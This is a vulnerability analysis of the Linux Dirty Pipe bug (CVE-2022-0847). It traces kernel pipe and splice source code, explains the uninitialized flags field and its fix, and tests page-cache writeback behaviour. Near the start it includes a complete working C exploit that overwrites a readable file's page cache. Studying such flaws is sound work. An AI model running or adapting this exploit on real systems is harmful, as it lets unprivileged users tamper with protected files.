Vulnerability root cause
- A pipe maintains an array of struct pipe_buffer; each pipe_buffer points to a page, and that page holds the pipe's data.
- Normally, writing to a pipe allocates a page, copies the data into it, and then points the pipe_buffer at that page. The splice system call implements a zero-copy technique: it makes the pipe_buffer point directly at the original data page, skipping the memory copy and improving efficiency.
- Writes to a pipe are rarely an exact multiple of PAGE_SIZE; if every write allocated a fresh page, space would inevitably be wasted. So if a pipe_buffer's PIPE_BUF_FLAG_CAN_MERGE flag is set, new data is appended after the previous data in the same page instead of a new page being allocated, reducing the waste.
- However, splice does not initialize the flags field when it fills in a pipe_buffer, so a PIPE_BUF_FLAG_CAN_MERGE flag set earlier is never cleared. As long as we first get PIPE_BUF_FLAG_CAN_MERGE set on every pipe_buffer, then call splice so that a pipe_buffer points at the target file's page cache, a subsequent write to the pipe modifies the page cache contents directly, giving an arbitrary file overwrite vulnerability (a minimal sketch of the full flow follows below).
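To make the steps above concrete, here is a minimal userspace sketch of the exploit flow. It is an illustration of the technique rather than the original PoC: the target path and payload are placeholders, the target file must be readable by the attacker, the payload must stay inside one page and cannot start at a page boundary, and all error handling is omitted.

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

int main(void)
{
    const char *target  = "/tmp/target.txt"; /* hypothetical target file (must be readable) */
    const char *payload = "pwned";           /* data to inject */
    loff_t offset = 0;                       /* splice 1 byte at this offset; the write lands at offset + 1 */

    int p[2];
    pipe(p);

    /* step 1: fill the whole pipe with ordinary writes, so pipe_write()
     * sets PIPE_BUF_FLAG_CAN_MERGE on every pipe_buffer ... */
    unsigned capacity = fcntl(p[1], F_GETPIPE_SZ);
    char scratch[4096] = {0};
    for (unsigned n = 0; n < capacity; n += sizeof(scratch))
        write(p[1], scratch, sizeof(scratch));

    /* step 2: ... then drain it again; every slot is free, but its
     * stale flags still carry PIPE_BUF_FLAG_CAN_MERGE */
    for (unsigned n = 0; n < capacity; n += sizeof(scratch))
        read(p[0], scratch, sizeof(scratch));

    /* step 3: splice one byte of the target file into the pipe; the next
     * pipe_buffer now points at the file's page cache page */
    int fd = open(target, O_RDONLY);
    splice(fd, &offset, p[1], NULL, 1, 0);

    /* step 4: an ordinary write to the pipe now "merges" into that buffer,
     * i.e. it writes straight into the target file's page cache */
    write(p[1], payload, strlen(payload));

    return 0;
}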
Source code analysis
The source code below is from Linux 5.8.1.
pipe
Key data structures
pipe_inode_info
/**
* struct pipe_inode_info - a linux kernel pipe
* @mutex: mutex protecting the whole thing
* @rd_wait: reader wait point in case of empty pipe
* @wr_wait: writer wait point in case of full pipe
* @head: The point of buffer production
* @tail: The point of buffer consumption
* @note_loss: The next read() should insert a data-lost message
* @max_usage: The maximum number of slots that may be used in the ring
* @ring_size: total number of buffers (should be a power of 2)
* @nr_accounted: The amount this pipe accounts for in user->pipe_bufs
* @tmp_page: cached released page
* @readers: number of current readers of this pipe
* @writers: number of current writers of this pipe
* @files: number of struct file referring this pipe (protected by ->i_lock)
* @r_counter: reader counter
* @w_counter: writer counter
* @fasync_readers: reader side fasync
* @fasync_writers: writer side fasync
* @bufs: the circular array of pipe buffers
* @user: the user who created this pipe
* @watch_queue: If this pipe is a watch_queue, this is the stuff for that
**/
struct pipe_inode_info {
struct mutex mutex;
wait_queue_head_t rd_wait, wr_wait;
unsigned int head;
unsigned int tail;
unsigned int max_usage;
unsigned int ring_size;
#ifdef CONFIG_WATCH_QUEUE
bool note_loss;
#endif
unsigned int nr_accounted;
unsigned int readers;
unsigned int writers;
unsigned int files;
unsigned int r_counter;
unsigned int w_counter;
struct page *tmp_page;
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
struct pipe_buffer *bufs;
struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
struct watch_queue *watch_queue;
#endif
};
Here bufs is an array of struct pipe_buffer, 16 entries by default, and each pipe_buffer can hold one page of data. Those 16 pages form a ring buffer that stores the pipe's data.
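The ring capacity can be inspected from userspace; a small sketch, assuming a freshly created pipe (the default of 16 one-page slots corresponds to F_GETPIPE_SZ returning 65536 on a 4 KiB-page system):

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    int p[2];
    pipe(p);
    long page  = sysconf(_SC_PAGESIZE);           /* page size in bytes */
    int  bytes = fcntl(p[1], F_GETPIPE_SZ);       /* total pipe capacity in bytes */
    printf("pipe capacity: %d bytes = %ld slots\n", bytes, bytes / page);
    return 0;
}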
pipe_buffer
/**
* struct pipe_buffer - a linux kernel pipe buffer
* @page: the page containing the data for the pipe buffer
* @offset: offset of data inside the @page
* @len: length of data inside the @page
* @ops: operations associated with this buffer. See @pipe_buf_operations.
* @flags: pipe buffer flags. See above.
* @private: private data owned by the ops.
**/
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
PIPE_BUF_FLAG_CAN_MERGE is one of the bits in the flags field; it determines whether new data may be merged into the page that page points to.
Writing to a pipe
Calling write to put data into a pipe goes through several layers of calls and ultimately ends up in pipe_write.
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
unsigned int head;
ssize_t ret = 0;
size_t total_len = iov_iter_count(from);
ssize_t chars;
bool was_empty = false;
bool wake_next_writer = false;
/* Null write succeeds. */
if (unlikely(total_len == 0))
return 0;
__pipe_lock(pipe);
// make sure there is at least one reader
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
ret = -EPIPE;
goto out;
}
#ifdef CONFIG_WATCH_QUEUE
if (pipe->watch_queue) {
ret = -EXDEV;
goto out;
}
#endif
/*
* Only wake up if the pipe started out empty, since
* otherwise there should be no readers waiting.
*
* If it wasn't empty we try to merge new data into
* the last buffer.
*
* That naturally merges small writes, but it also
* page-aligns the rest of the writes for large writes
* spanning multiple pages.
*/
head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1); // size of the data to write modulo the page size
// if the remainder is non-zero and the pipe is not empty
if (chars && !was_empty) {
unsigned int mask = pipe->ring_size - 1;
// the buffer just before the current head, since we try to merge the leftover data into the previous buffer
struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
int offset = buf->offset + buf->len;
// if PIPE_BUF_FLAG_CAN_MERGE is set and buf still has room for chars bytes
if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
ret = pipe_buf_confirm(pipe, buf);
if (ret)
goto out;
// copy chars bytes into the buffer
ret = copy_page_from_iter(buf->page, offset, chars, from);
if (unlikely(ret < chars)) {
ret = -EFAULT;
goto out;
}
buf->len += ret;
// if there is no more data to write, we are done
if (!iov_iter_count(from))
goto out;
}
}
for (;;) {
// make sure there is still at least one reader
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
if (!ret)
ret = -EPIPE;
break;
}
head = pipe->head;
// if the pipe is not full
if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[head & mask];
struct page *page = pipe->tmp_page; // tmp_page holds a cached page for the new data
int copied;
// if tmp_page has not been allocated yet, allocate a page with alloc_page
if (!page) {
page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
if (unlikely(!page)) {
ret = ret ? : -ENOMEM;
break;
}
pipe->tmp_page = page;
}
/* Allocate a slot in the ring in advance and attach an
* empty buffer. If we fault or otherwise fail to use
* it, either the reader will consume it or it'll still
* be there for the next write.
*/
// take the spinlock protecting the reader wait queue
spin_lock_irq(&pipe->rd_wait.lock);
head = pipe->head;
// if the pipe has filled up in the meantime, go round the loop again
if (pipe_full(head, pipe->tail, pipe->max_usage)) {
spin_unlock_irq(&pipe->rd_wait.lock);
continue;
}
// advance the head pointer to the next slot first
pipe->head = head + 1;
spin_unlock_irq(&pipe->rd_wait.lock); // release the spinlock
/* Insert it into the buffer array */
buf = &pipe->bufs[head & mask];
buf->page = page; // point buf->page at the tmp_page allocated above
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
buf->len = 0;
// if the pipe was not created with O_DIRECT, flags is set to PIPE_BUF_FLAG_CAN_MERGE
// so any pipe created without O_DIRECT gets PIPE_BUF_FLAG_CAN_MERGE set on every buffer written this way (see the short sketch after this function)
if (is_packetized(filp))
buf->flags = PIPE_BUF_FLAG_PACKET;
else
buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
pipe->tmp_page = NULL; // clear tmp_page
// copy up to one page of data into the page
copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
if (!ret)
ret = -EFAULT;
break;
}
ret += copied;
buf->offset = 0;
buf->len = copied;
if (!iov_iter_count(from))
break;
}
......
}
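As the comments above note, which flag a fresh pipe_buffer receives depends only on how the pipe was created. A tiny illustrative sketch (descriptor names are arbitrary):

/* Sketch: plain vs. packet-mode pipes and the flag their buffers receive. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <unistd.h>

int main(void)
{
    int p_merge[2], p_packet[2];

    pipe(p_merge);              /* plain pipe: pipe_write() sets PIPE_BUF_FLAG_CAN_MERGE */
    pipe2(p_packet, O_DIRECT);  /* packet-mode pipe: is_packetized() is true,
                                   so buffers get PIPE_BUF_FLAG_PACKET instead */

    /* the exploit therefore has to use a plain pipe() */
    return 0;
}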
splice
The splice system call is handled mainly by the do_splice function, which takes different branches depending on the kinds of file descriptors it is given. In this exploit, in is a regular file and out is a pipe, so execution enters the if (opipe) branch.
/*
* Determine where to splice to/from.
*/
long do_splice(struct file *in, loff_t __user *off_in,
struct file *out, loff_t __user *off_out,
size_t len, unsigned int flags)
{
struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset;
long ret;
if (unlikely(!(in->f_mode & FMODE_READ) ||
!(out->f_mode & FMODE_WRITE)))
return -EBADF;
ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);
// both in and out are pipes
if (ipipe && opipe) {
......
}
// only in is a pipe
if (ipipe) {
......
}
// only out is a pipe
if (opipe) {
// handle the offsets for in and out
if (off_out)
return -ESPIPE;
if (off_in) {
if (!(in->f_mode & FMODE_PREAD))
return -EINVAL;
if (copy_from_user(&offset, off_in, sizeof(loff_t)))
return -EFAULT;
} else {
offset = in->f_pos;
}
if (out->f_flags & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;
pipe_lock(opipe);
// wait until the pipe has a free buffer
ret = wait_for_space(opipe, flags);
if (!ret) {
unsigned int p_space;
/* Don't try to read more the pipe has space for. */
p_space = opipe->max_usage - pipe_occupancy(opipe->head, opipe->tail); // free space in the pipe
len = min_t(size_t, len, p_space << PAGE_SHIFT); // do not read more than the pipe has room for
ret = do_splice_to(in, &offset, opipe, len, flags); // do_splice_to does the real work
}
pipe_unlock(opipe);
if (ret > 0)
wakeup_pipe_readers(opipe);
if (!off_in)
in->f_pos = offset;
else if (copy_to_user(off_in, &offset, sizeof(loff_t)))
ret = -EFAULT;
return ret;
}
return -EINVAL;
}
do_splice_to in turn calls the input file's splice_read function; after a further chain of calls, copy_page_to_iter_pipe finally does the work of linking the file's page cache to the pipe buffer.
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
struct pipe_inode_info *pipe = i->pipe;
struct pipe_buffer *buf;
unsigned int p_tail = pipe->tail;
unsigned int p_mask = pipe->ring_size - 1;
unsigned int i_head = i->head;
size_t off;
if (unlikely(bytes > i->count))
bytes = i->count;
if (unlikely(!bytes))
return 0;
if (!sanity(i))
return 0;
off = i->iov_offset;
buf = &pipe->bufs[i_head & p_mask];
if (off) {
// if the requested offset matches the current one and the head buffer already points at this page,
// just extend the buffer
if (offset == off && buf->page == page) {
/* merge with the last one */
buf->len += bytes;
i->iov_offset += bytes;
goto out;
}
i_head++;
buf = &pipe->bufs[i_head & p_mask];
}
if (pipe_full(i_head, p_tail, pipe->max_usage))
return 0;
buf->ops = &page_cache_pipe_buf_ops;
// take a reference on the page
get_page(page);
// point the pipe buffer's page pointer at the file's page cache page
buf->page = page;
buf->offset = offset;
buf->len = bytes;
pipe->head = i_head + 1;
i->iov_offset = offset + bytes;
i->head = i_head;
out:
i->count -= bytes;
return bytes;
}
As we can see, copy_page_to_iter_pipe assigns the page cache page directly to the buffer's page pointer without initializing the buffer's flags, so a PIPE_BUF_FLAG_CAN_MERGE bit set earlier remains in effect.
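The fix is correspondingly simple: initialize the flags field whenever the pipe_buffer is populated here (the upstream patch adds the same one-line initialization in push_pipe as well). A sketch of what the relevant assignment in copy_page_to_iter_pipe looks like after the fix:

buf->ops = &page_cache_pipe_buf_ops;
buf->flags = 0; /* the fix: clear stale flags such as PIPE_BUF_FLAG_CAN_MERGE */
get_page(page);
buf->page = page;
buf->offset = offset;
buf->len = bytes;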
Does it really overwrite the file contents?
From the analysis above, what ultimately gets overwritten is the page cache, not the file contents on disk. As long as the file's page cache pages exist, subsequent reads of the file are served directly from them, so while those pages exist the effect is the same as overwriting the file. In testing, the page cache disappears after a reboot, and reading the file then returns the original contents.
But doesn't the page cache have a writeback mechanism? If that mechanism is triggered, won't the overwritten page cache be written back to disk?
To check, I called sync to trigger writeback manually.
The program's output showed that the file contents read after calling sync were still the tampered contents, so at first glance it looked as if sync really had written the page cache back to disk.
But after rebooting the system, the file contents were restored. That means sync neither wrote the page cache back to disk nor discarded the cached contents; it simply ignored the tampered page. Why?
Debugging shows that writing data to a regular file goes through generic_file_write_iter.
Through its chain of calls, set_page_dirty is eventually invoked to mark the page dirty, so the writeback mechanism later writes the page back to disk.
As noted in the source analysis above, writing into a pipe goes through pipe_write instead. With a breakpoint on set_page_dirty, I found that the function is never called on this path, which the source code also confirms.
This means that when we use the vulnerability to modify the page cache, the kernel never marks the corresponding page dirty, so the modification is invisible to the writeback mechanism and is simply ignored.
So why do the file contents come back after a reboot? Because rebooting reclaims all the caches. Running echo 1 > /proc/sys/vm/drop_caches reclaims the caches manually and likewise restores the original file contents.
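The behaviour described above can be reproduced with a small helper that re-reads the target file after each step; a sketch, assuming the exploit has already tampered with /tmp/target.txt (a hypothetical path) and that the program runs as root so it may drop the caches:

/* Sketch: sync() does not persist the tampered page cache, while
 * dropping the caches brings the original file content back. */
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

static void dump(const char *path)
{
    char buf[64] = {0};
    int fd = open(path, O_RDONLY);
    read(fd, buf, sizeof(buf) - 1);
    close(fd);
    printf("%s\n", buf);
}

int main(void)
{
    const char *target = "/tmp/target.txt"; /* hypothetical target file */

    dump(target);   /* tampered content, served from the page cache */

    sync();         /* trigger writeback manually */
    dump(target);   /* still tampered: the page was never marked dirty */

    /* drop the page cache (requires root) */
    int fd = open("/proc/sys/vm/drop_caches", O_WRONLY);
    write(fd, "1", 1);
    close(fd);

    dump(target);   /* original on-disk content is back */
    return 0;
}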
References
The Dirty Pipe Vulnerability
CVE-2022-0847-DirtyPipe-Exploit
Linux 5.8.1 source code
CVE-2022-0847 vulnerability analysis
VFS source code analysis: the page cache writeback mechanism